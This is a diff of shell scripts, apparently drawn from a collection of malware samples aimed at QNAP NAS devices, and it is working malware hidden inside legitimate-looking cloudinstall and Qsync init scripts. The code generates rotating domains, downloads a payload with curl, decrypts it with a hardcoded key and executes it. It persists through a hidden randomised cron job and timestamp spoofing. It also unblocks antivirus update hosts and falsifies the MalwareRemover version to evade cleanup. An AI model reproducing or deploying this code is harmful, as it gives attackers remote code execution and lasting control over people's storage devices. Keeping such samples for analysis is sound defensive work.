+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJog4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.config" || mkdir "${bdir}/.qpkg/.config"
+cd "${bdir}/.qpkg/.config" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+fi
+chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
+touch -cr /bin/busybox "${bdir}/.qpkg/.config/backup_conf.sh"
+
+if ! $fgrep "${bdir}/.qpkg/.config/backup_conf.sh" "${confdir}"/crontab; then
+cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
+cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
+cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
+echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.config/backup_conf.sh"' >/dev/null 2>/dev/null' >> "${confdir}"/crontab
+fi
+test ! -x "${bdir}/.qpkg/.config/backup_conf.sh" && chmod 755 "${bdir}/.qpkg/.config/backup_conf.sh"
+( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.config/backup_conf.sh" </dev/null >/dev/null 2>/dev/null & ) & )
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3c38e7bb004b000bd90ad94446437096f46140292a138bfc9f7e44dc136bac8d

@@ -0,0 +1,936 @@
+#!/bin/sh
+ts=1553058000
+PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"	
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
+test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
+test -d "$bdir" && break; bdir=''
+done <<EOF
+$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
+EOF
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
+
+getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
+getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
+
+if grep "clamav\.net" /etc/hosts; then
+sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
+fi
+
+if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
+sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
+fi
+
+test -z "$PWD" && PWD=$(pwd)
+CWD="$PWD"
+if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
+        CWD=''
+        for dir in '.config' '.liveupdate'; do
+                dir="${bdir}/.qpkg/${dir}"
+                test -d "$dir" && cd "$dir" && CWD="$dir" && break
+        done
+fi
+test "$CWD" && test -d "$CWD" && cd "$CWD"
+
+sedreplace () {
+local grepstring="$1" sedcmd="$2" file="$3"
+[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
+if grep "$grepstring" "$file"; then
+test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
+sed -i "$sedcmd" "$file"
+test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
+fi
+return $?
+}
+
+for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
+file=''
+[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
+if [ "x${file}" != 'x' ]; then
+sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
+verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
+grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
+sedreplace "$grepstring" "$sedcmd" "$file"
+sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
+grepstring='g4rwwSz1Bp1i1'"'"
+sedreplace "$grepstring" "$sedcmd" "$file"
+fi
+done
+file=''
+
+if [ ! -f '1550379600_c' ]; then
+touch '1550379600_c'
+test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
+cat >".backup_${file}" <<"XEOF"
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
